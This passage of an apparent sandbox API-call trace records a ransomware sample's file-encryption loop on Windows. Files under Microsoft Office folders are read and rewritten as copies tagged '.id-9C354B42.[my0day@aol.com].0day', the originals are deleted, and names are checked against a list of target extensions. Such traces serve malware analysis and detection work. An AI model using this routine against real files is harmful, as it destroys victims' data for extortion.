(hFile=0x1d8) returned 1 [0050.103] CloseHandle (hObject=0x1d8) returned 1 [0050.104] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.104] SetEndOfFile (hFile=0x198) returned 1 [0050.107] CloseHandle (hObject=0x198) returned 1 [0050.107] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0050.107] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0050.107] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.107] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.107] lstrlenW (lpString=".doc") returned 4 [0050.107] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.107] lstrlenW (lpString=".docx") returned 5 [0050.107] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0050.107] lstrlenW (lpString=".pdf") returned 4 [0050.107] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.107] lstrlenW (lpString=".xls") returned 4 [0050.107] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.107] lstrlenW (lpString=".xlsx") returned 5 [0050.107] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0050.107] lstrlenW (lpString=".ppt") returned 4 [0050.107] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.107] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.108] lstrlenW (lpString=".zip") returned 4 [0050.108] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.108] lstrlenW (lpString=".rar") returned 4 [0050.108] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.108] lstrlenW (lpString=".bz2") returned 4 [0050.108] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.108] lstrlenW (lpString=".7z") returned 3 [0050.108] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.108] lstrlenW (lpString=".dbf") returned 4 [0050.108] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.108] lstrlenW (lpString=".1cd") returned 4 [0050.108] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.108] lstrlenW (lpString=".jpg") returned 4 [0050.108] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.108] lstrlenW (lpString=".doc") returned 4 [0050.108] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.108] lstrlenW (lpString=".docx") returned 5 [0050.108] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0050.108] lstrlenW (lpString=".pdf") returned 4 [0050.108] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.108] lstrlenW (lpString=".xls") returned 4 [0050.108] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.108] lstrlenW (lpString=".xlsx") returned 5 [0050.108] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0050.108] lstrlenW (lpString=".ppt") returned 4 [0050.108] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.108] lstrlenW (lpString=".zip") returned 4 [0050.108] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.108] lstrlenW (lpString=".rar") returned 4 [0050.109] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.109] lstrlenW (lpString=".bz2") returned 4 [0050.109] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.109] lstrlenW (lpString=".7z") returned 3 [0050.109] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.109] lstrlenW (lpString=".dbf") returned 4 [0050.109] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.109] lstrlenW (lpString=".1cd") returned 4 [0050.109] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.109] lstrlenW (lpString=".jpg") returned 4 [0050.109] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.109] lstrcmpiW (lpString1=".EXE", lpString2=".0day") returned 1 [0050.109] lstrlenW (lpString="DW20.EXE") returned 8 [0050.109] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0050.354] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=994184) returned 1 [0050.354] CloseHandle (hObject=0x220) returned 1 [0050.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 0x20 [0050.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0050.354] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.354] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0050.354] GetLastError () returned 0x0 [0050.355] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xf2b88, lpOverlapped=0x0) returned 1 [0050.373] WriteFile (in: hFile=0x16c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xf2b90, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xf2b90, lpOverlapped=0x0) returned 1 [0050.454] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.454] WriteFile (in: hFile=0x16c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0050.454] SetEndOfFile (hFile=0x16c) returned 1 [0051.504] CloseHandle (hObject=0x16c) returned 1 [0051.760] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.760] SetEndOfFile (hFile=0x220) returned 1 [0051.775] CloseHandle (hObject=0x220) returned 1 [0051.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.775] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 1 [0051.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.775] lstrlenW (lpString=".doc") returned 4 [0051.775] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.775] lstrlenW (lpString=".docx") returned 5 [0051.775] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.775] lstrlenW (lpString=".pdf") returned 4 [0051.776] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.776] lstrlenW (lpString=".xls") returned 4 [0051.776] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.776] lstrlenW (lpString=".xlsx") returned 5 [0051.776] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.776] lstrlenW (lpString=".ppt") returned 4 [0051.776] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.776] lstrlenW (lpString=".zip") returned 4 [0051.776] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.776] lstrlenW (lpString=".rar") returned 4 [0051.776] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.776] lstrlenW (lpString=".bz2") returned 4 [0051.776] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.776] lstrlenW (lpString=".7z") returned 3 [0051.776] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.776] lstrlenW (lpString=".dbf") returned 4 [0051.776] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.776] lstrlenW (lpString=".1cd") returned 4 [0051.776] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.776] lstrlenW (lpString=".jpg") returned 4 [0051.776] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.776] lstrlenW (lpString=".doc") returned 4 [0051.776] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.776] lstrlenW (lpString=".docx") returned 5 [0051.776] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.776] lstrlenW (lpString=".pdf") returned 4 [0051.776] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.776] lstrlenW (lpString=".xls") returned 4 [0051.777] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.777] lstrlenW (lpString=".xlsx") returned 5 [0051.777] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.777] lstrlenW (lpString=".ppt") returned 4 [0051.777] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.777] lstrlenW (lpString=".zip") returned 4 [0051.777] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.777] lstrlenW (lpString=".rar") returned 4 [0051.777] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.777] lstrlenW (lpString=".bz2") returned 4 [0051.777] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.777] lstrlenW (lpString=".7z") returned 3 [0051.777] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.777] lstrlenW (lpString=".dbf") returned 4 [0051.777] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.777] lstrlenW (lpString=".1cd") returned 4 [0051.777] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.777] lstrlenW (lpString=".jpg") returned 4 [0051.777] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.777] lstrcmpiW (lpString1=".CFG", lpString2=".0day") returned 1 [0051.777] lstrlenW (lpString="CGMIMP32.CFG") returned 12 [0051.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.778] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=6811) returned 1 [0051.778] CloseHandle (hObject=0x220) returned 1 [0051.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 0x20 [0051.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.778] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.778] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.778] GetLastError () returned 0x0 [0051.778] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x1a9b, lpOverlapped=0x0) returned 1 [0051.780] WriteFile (in: hFile=0x210, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x1aa0, lpOverlapped=0x0) returned 1 [0051.781] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.781] WriteFile (in: hFile=0x210, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.781] SetEndOfFile (hFile=0x210) returned 1 [0051.781] CloseHandle (hObject=0x210) returned 1 [0051.781] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.781] SetEndOfFile (hFile=0x220) returned 1 [0051.782] CloseHandle (hObject=0x220) returned 1 [0051.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.782] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 1 [0051.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.782] lstrlenW (lpString=".doc") returned 4 [0051.782] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0051.782] lstrlenW (lpString=".docx") returned 5 [0051.782] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0051.783] lstrlenW (lpString=".pdf") returned 4 [0051.783] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString=".xls") returned 4 [0051.783] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString=".xlsx") returned 5 [0051.783] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0051.783] lstrlenW (lpString=".ppt") returned 4 [0051.783] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.783] lstrlenW (lpString=".zip") returned 4 [0051.783] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString=".rar") returned 4 [0051.783] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString=".bz2") returned 4 [0051.783] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0051.783] lstrlenW (lpString=".7z") returned 3 [0051.783] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0051.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.783] lstrlenW (lpString=".dbf") returned 4 [0051.783] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.783] lstrlenW (lpString=".1cd") returned 4 [0051.783] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0051.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.783] lstrlenW (lpString=".jpg") returned 4 [0051.783] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.783] lstrlenW (lpString=".doc") returned 4 [0051.783] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString=".docx") returned 5 [0051.783] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0051.783] lstrlenW (lpString=".pdf") returned 4 [0051.783] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0051.783] lstrlenW (lpString=".xls") returned 4 [0051.784] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0051.784] lstrlenW (lpString=".xlsx") returned 5 [0051.784] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0051.784] lstrlenW (lpString=".ppt") returned 4 [0051.784] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0051.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.784] lstrlenW (lpString=".zip") returned 4 [0051.784] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0051.784] lstrlenW (lpString=".rar") returned 4 [0051.784] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0051.784] lstrlenW (lpString=".bz2") returned 4 [0051.784] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0051.784] lstrlenW (lpString=".7z") returned 3 [0051.784] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0051.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.784] lstrlenW (lpString=".dbf") returned 4 [0051.784] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0051.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.784] lstrlenW (lpString=".1cd") returned 4 [0051.784] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0051.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.784] lstrlenW (lpString=".jpg") returned 4 [0051.784] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0051.784] lstrcmpiW (lpString1=".FLT", lpString2=".0day") returned 1 [0051.784] lstrlenW (lpString="CGMIMP32.FLT") returned 12 [0051.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.785] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=323936) returned 1 [0051.785] CloseHandle (hObject=0x220) returned 1 [0051.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 0x20 [0051.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.785] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.786] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.786] GetLastError () returned 0x0 [0051.786] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x4f160, lpOverlapped=0x0) returned 1 [0051.794] WriteFile (in: hFile=0x210, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x4f170, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x4f170, lpOverlapped=0x0) returned 1 [0051.799] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.799] WriteFile (in: hFile=0x210, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.799] SetEndOfFile (hFile=0x210) returned 1 [0051.799] CloseHandle (hObject=0x210) returned 1 [0051.799] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.799] SetEndOfFile (hFile=0x220) returned 1 [0051.802] CloseHandle (hObject=0x220) returned 1 [0051.802] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.803] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 1 [0051.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.803] 